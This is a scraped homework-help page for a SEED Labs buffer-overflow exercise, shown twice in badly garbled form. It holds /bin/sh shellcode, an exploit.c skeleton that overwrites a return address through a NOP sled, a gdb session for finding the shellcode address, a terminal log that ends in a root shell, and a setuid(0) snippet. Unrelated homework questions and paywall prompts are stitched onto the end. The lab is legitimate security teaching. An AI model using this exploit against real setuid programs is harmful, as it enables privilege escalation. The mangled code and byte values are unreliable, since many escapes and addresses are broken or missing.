Task 1 Exploiting the Vulnerability We provide you with a partially completed exploit code called exploit c The goal of this code is to construct contents for badfile In the code, the shellcode is given to you You need to develop the rest exploit c A program that creates a file containing code for launching shell include include include char shellcode x 3 1 xc 0 xorl eax, eax x 5 0 pushl eax x 6 8 sh pushl $ 0 x 6 8 7 3 2 f 2 f x 6 8 bin pushl $ 0 x 6 e 6 9 6 2 2 f x 8 9 xe 3 movl esp, ebx x 5 0 pushl eax x 5 3 pushl ebx x 8 9 xe 1 movl esp, ecx x 9 9 cdq xb 0 x 0 b movb $ 0 x 0 b , al xcd x 8 0 int $ 0 x 8 0 void main ( int argc, char argv ) char buffer 5 1 7 FILE badfile Initialize buffer with 0 x 9 0 ( NOP instruction ) memset ( buffer, 0 x 9 0 , 5 1 7 ) You need to fill the buffer with appropriate contents here strcpy ( buffer , x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x 9 0 x x x x ) strcpy ( buffer 1 0 0 , shellcode ) Save the contents to the file badfile badfile fopen ( badfile , w ) fwrite ( buffer , 5 1 7 , 1 , badfile ) fclose ( badfile ) To beginning the attack, we need the address of shellcode seed ubuntu Desktop$ gdb quiet stack Reading symbols from home seed Desktop stack ( no debugging symbols found ) done ( gdb ) disassemble main Dump of assembler code for function main 0 x 0 8 0 4 8 4 a 3 0 push ebp 0 x 0 8 0 4 8 4 a 4 1 mov esp, ebp 0 x 0 8 0 4 8 4 a 6 3 and $ 0 xfffffff 0 , esp 0 x 0 8 0 4 8 4 a 9 6 sub $ 0 x 2 2 0 , esp 0 x 0 8 0 4 8 4 af 1 2 mov $ 0 x 8 0 4 8 5 f 0 , edx 0 x 0 8 0 4 8 4 b 4 1 7 mov $ 0 x 8 0 4 8 5 f 2 , eax 0 x 0 8 0 4 8 4 b 9 2 2 mov edx, 0 x 4 ( esp ) 0 x 0 8 0 4 8 4 bd 2 6 mov eax, ( esp ) 0 x 0 8 0 4 8 4 c 0 2 9 call 0 x 8 0 4 8 3 c 0 0 x 0 8 0 4 8 4 c 5 3 4 mov eax, 0 x 2 1 c ( esp ) 0 x 0 8 0 4 8 4 cc 4 1 lea 0 x 1 7 ( esp ) , eax 0 x 0 8 0 4 8 4 d 0 4 5 mov 0 x 2 1 c ( esp ) , edx 0 x 0 8 0 4 8 4 d 7 5 2 mov edx, 0 xc ( esp ) 0 x 0 8 0 4 8 4 db 5 6 movl $ 0 x 2 0 5 , 0 x 8 ( esp ) 0 x 0 8 0 4 8 4 e 3 6 4 movl $ 0 x 1 , 0 x 4 ( esp ) 0 x 0 8 0 4 8 4 eb 7 2 mov eax, ( esp ) 0 x 0 8 0 4 8 4 ee 7 5 call 0 x 8 0 4 8 3 7 0 0 x 0 8 0 4 8 4 f 3 8 0 lea 0 x 1 7 ( esp ) , eax 0 x 0 8 0 4 8 4 f 7 8 4 mov eax, ( esp ) 0 x 0 8 0 4 8 4 fa 8 7 call 0 x 8 0 4 8 4 8 4 0 x 0 8 0 4 8 4 ff 9 2 movl $ 0 x 8 0 4 8 5 fa , ( esp ) 0 x 0 8 0 4 8 5 0 6 9 9 call 0 x 8 0 4 8 3 9 0 0 x 0 8 0 4 8 5 0 b 1 0 4 mov $ 0 x 1 , eax 0 x 0 8 0 4 8 5 1 0 1 0 9 leave 0 x 0 8 0 4 8 5 1 1 1 1 0 ret End of assembler dump ( gdb ) b 0 x 0 8 0 4 8 4 af Breakpoint 1 at 0 x 8 0 4 8 4 af ( gdb ) r Starting program home seed Desktop stack Breakpoint 1 , 0 x 0 8 0 4 8 4 af in main ( ) ( gdb ) i r $esp esp 0 xbffff 1 5 0 0 xbffff 1 5 0 We know esp's value is the beginning address of str , according to strcpy ( buffer 1 0 0 , shellcode ) , we can calculate shellcode's address is 0 xbffff 1 5 0 ( HEX ) 1 0 0 ( DEC ) 0 xbffff 1 b 4 ( HEX ) We replace x x x x to xb 4 xf 1 xff xbf , because when buffer overflow happened this place's return address will be overwrite After we finish the above program, compile and run it This will generate the contents for badfile Then run the vulnerable program stack If our exploit is implemented correctly, we should be able to get a root shell 0 8 1 0 2 0 1 6 0 5 5 6 seed ubuntu Desktop$ exploit 0 8 1 0 2 0 1 6 0 5 5 6 seed ubuntu Desktop$ stack whoami root Many commands will behave differently if they are executed as Set UID root processes, instead of just as root processes, because they recognize that the real user id is not root To solve this problem, you can run the following program to turn the real user id to root This way, you will have a real root process, which is more powerful void main ( ) setuid ( 0 ) system ( bin sh ) please provide screenshot

The Answer is in the image, click to view ...

Question: Task 1 . Exploiting the Vulnerability We provide you with a partially completed exploit code called exploit.c . The goal of this code is

Task

1 .

Exploiting the Vulnerability

We provide you with a partially completed exploit code called "exploit.c

" .

The goal of this code is to construct contents for "badfile". In the code, the shellcode is given to you. You need to develop the rest.

/ *

exploit.c

* /

/ *

A program that creates a file containing code for launching shell

* /

#include

char shellcode

[] =

" \

31 \

0 " / *

xorl

%

eax,

%

eax

* /

" \

50 " / *

pushl

%

eax

* /

" \

68 " " / /

" / *

pushl $

0

68732

2

* /

" \

68 " " /

bin

" / *

pushl $

0

6

69622

* /

" \

89 \

3 " / *

movl

%

esp,

%

ebx

* /

" \

50 " / *

pushl

%

eax

* /

" \

53 " / *

pushl

%

ebx

* /

" \

89 \

1 " / *

movl

%

esp,

%

ecx

* /

" \

99 " / *

cdq

* /

" \

0 \

0

" / *

movb $

0

0

, %

* /

" \

xcd

\

80 " / *

int $

0

80 * /

;

void main

(

int argc, char

* *

argv

)

{

char buffer

[517]

;

FILE

*

badfile;

/ *

Initialize buffer with

0

90 (

NOP instruction

) * /

memset

(

&buffer,

0

90, 517)

;

/ *

You need to fill the buffer with appropriate contents here

* /

/ *

strcpy

(

buffer

, " \

90 \

90 \

90 \

90 \

90 \

90 \

90 \

90 \

90 \

90 \

90 \

90 \

90 \

90 \

90 \

90 \

90 \

90 \

90 \

90 \

90 \

90 \

90 \

90 \

? ? \

? ? \

? ? \

? ? ")

;

* /

/ *

strcpy

(

buffer

+ 100,

shellcode

)

;

* /

/ *

Save the contents to the file "badfile"

* /

badfile

=

fopen

(" . /

badfile

", "

")

;

fwrite

(

buffer

, 517, 1,

badfile

)

;

fclose

(

badfile

)

;

}

To beginning the attack, we need the address of shellcode.

seed@ubuntu:~

/

Desktop$ gdb

- -

quiet stack

Reading symbols from

/

home

/

seed

/

Desktop

/

stack

. . . (

no debugging symbols found

) . . .

done.

(

gdb

)

disassemble main

Dump of assembler code for function main:

0

080484

3 < + 0 >

: push

%

ebp

0

080484

4 < + 1 >

: mov

%

esp,

%

ebp

0

080484

6 < + 3 >

: and $

0

xfffffff

0, %

esp

0

080484

9 < + 6 >

: sub $

0

220, %

esp

0

080484

< + 12 >

: mov $

0

80485

0, %

edx

0

080484

4 < + 17 >

: mov $

0

80485

2, %

eax

0

080484

9 < + 22 >

: mov

%

edx,

0

4 (%

esp

)

0

080484

< + 26 >

: mov

%

eax,

(%

esp

)

0

080484

0 < + 29 >

: call

0

80483

0

0

080484

5 < + 34 >

: mov

%

eax,

0

21

(%

esp

)

0

080484

< + 41 >

: lea

0

17 (%

esp

), %

eax

0

080484

0 < + 45 >

: mov

0

21

(%

esp

), %

edx

0

080484

7 < + 52 >

: mov

%

edx,

0

(%

esp

)

0

080484

< + 56 >

: movl $

0

205, 0

8 (%

esp

)

0

080484

3 < + 64 >

: movl $

0

1, 0

4 (%

esp

)

0

080484

< + 72 >

: mov

%

eax,

(%

esp

)

0

080484

< + 75 >

: call

0

8048370

0

080484

3 < + 80 >

: lea

0

17 (%

esp

), %

eax

0

080484

7 < + 84 >

: mov

%

eax,

(%

esp

)

0

080484

< + 87 >

: call

0

8048484

0

080484

< + 92 >

: movl $

0

80485

, (%

esp

)

0

08048506 < + 99 >

: call

0

8048390

0

0804850

< + 104 >

: mov $

0

1, %

eax

0

08048510 < + 109 >

: leave

0

08048511 < + 110 >

: ret

End of assembler dump.

(

gdb

)

* 0

080484

Breakpoint

1

0

80484

(

gdb

)

Starting program:

/

home

/

seed

/

Desktop

/

stack

Breakpoint

1, 0

080484

af in main

()

(

gdb

)

i r $esp

esp

0

xbffff

150 0

xbffff

150

We know esp's value is the beginning address of str

,

according to strcpy

(

buffer

+ 100,

shellcode

)

;

,

we can calculate shellcode's address is

0

xbffff

150 (

HEX

) + 100 (

DEC

) = 0

xbffff

1

4 (

HEX

) .

We replace

\

? ? \

? ? \

? ? \

? ?

\

4 \

1 \

xff

\

xbf

,

because when buffer overflow happened this place's return address will be overwrite.

After we finish the above program, compile and run it

.

This will generate the contents for "badfile". Then run the vulnerable program stack. If our exploit is implemented correctly, we should be able to get a root shell.

[08 / 10 / 2016 05

56]

seed@ubuntu:~

/

Desktop$

. /

exploit

[08 / 10 / 2016 05

56]

seed@ubuntu:~

/

Desktop$

. /

stack

# whoami

root

Many commands will behave differently if they are executed as Set

-

UID root processes, instead of just as root processes, because they recognize that the real user id is not root. To solve this problem, you can run the following program to turn the real user id to root. This way, you will have a real root process, which is more powerful.

void main

()

{

setuid

(0)

; system

(" /

bin

/

")

;

}

please provide screenshot

Step by Step Solution

There are 3 Steps involved in it

1 Expert Approved Answer

Step: 1 Unlock blur-text-image

Question Has Been Solved by an Expert!

Get step-by-step solutions from verified subject matter experts

Step: 2 Unlock

Step: 3 Unlock

Students Have Also Explored These Related Databases Questions!

Please only edit/answer part that states "Put your code here" Thank you 2.4 Task 2: Exploiting the Vulnerability We provide you with a partially completed exploit code called "exploit.c". The goal of...

We provide you with a partially completed exploit code called exploit . c . The goal of this code is to construct contents for badfile . In this code, the shellcode is given to you. You need to...

We provide you with a partially completed exploit code called exploit.c. The goal of this code is to construct contents for badfile. In this code, the shellcode is given to you. You need to develop...

Lab 1 BufferOverflow Task 1 :We provide you with a completed exploit code called exploit . py . You need to adjust the variables of the program accordingly and fill in any missing code to fulfill the...

please answer 4,5&6 as they are interconnected to task 1&2 . the first page is instructions and then task 2 . at the end i have uploaded task 1 . dont know the answer? task 4,5&6 based on 1&2 SEED...

computer security course, please I need help it due 3 hours. 1 Lab Overview The learning objective of this lab is for students to gain the first-hand experience on buffer-overflow vulner- ability by...

2.5 Task 3: Exploiting the buffer-overflow vulnerability We are ready to create the content of badfile. Since the content involves some binary data (e.g., the address of the libc functions), we can...

/ * This program has a buffer overflow vulnerability. * / #include #include #include int foo ( char * str ) { char buffer [ 5 0 0 ] ; / * The following statement has a buffer overflow problem * /...

Task 1: We provide you with a completed exploit code called "exploit.py". You need to adjust the variables of the program accordingly and fill in any missing code to fulfill the buffer overflow...

"PLEASE DO TASK 3 AND READ EVERYTHING CAREFULLY" in C++ "DO STEP BY STEP. THANK YOU" 5. Task 3: Launching Attack on 32-bit Program (Level 1)\} Investigation To exploit the buffer-overflow...

The weights (in grams) of 25 indicator housings used on gauges are as follows: (a) Construct an ordered stem-and-leaf display, using integers as the stems and tenths as the leaves. (b) Find the...

QUESTION1) Find the r.m.s value of the current i(t) in the circuit shown below is i(t). IF 1H -xxxxo) M M + (1.0 sint) V

If the exchange rate from USD to euros is $ 1 . 1 3 9 7 / 1 $ 1 . 1 3 9 7 / 1 , how much would 7 9 . 7 5 7 9 . 7 5 be worth in the United States, rounded to the nearest cent?

Which of the following inventory management techniques aims to reduce holding costs by ordering inventory only when it is needed? A ) Just - in - Time ( JIT ) inventory B ) Economic Order Quantity (...

3. If so, what should it cover, and how would you suggest it deal with a situation such as the one with the errant counter people?

3. Give examples of four fair disciplinary practices.

4. Explain how to use fair disciplinary practices.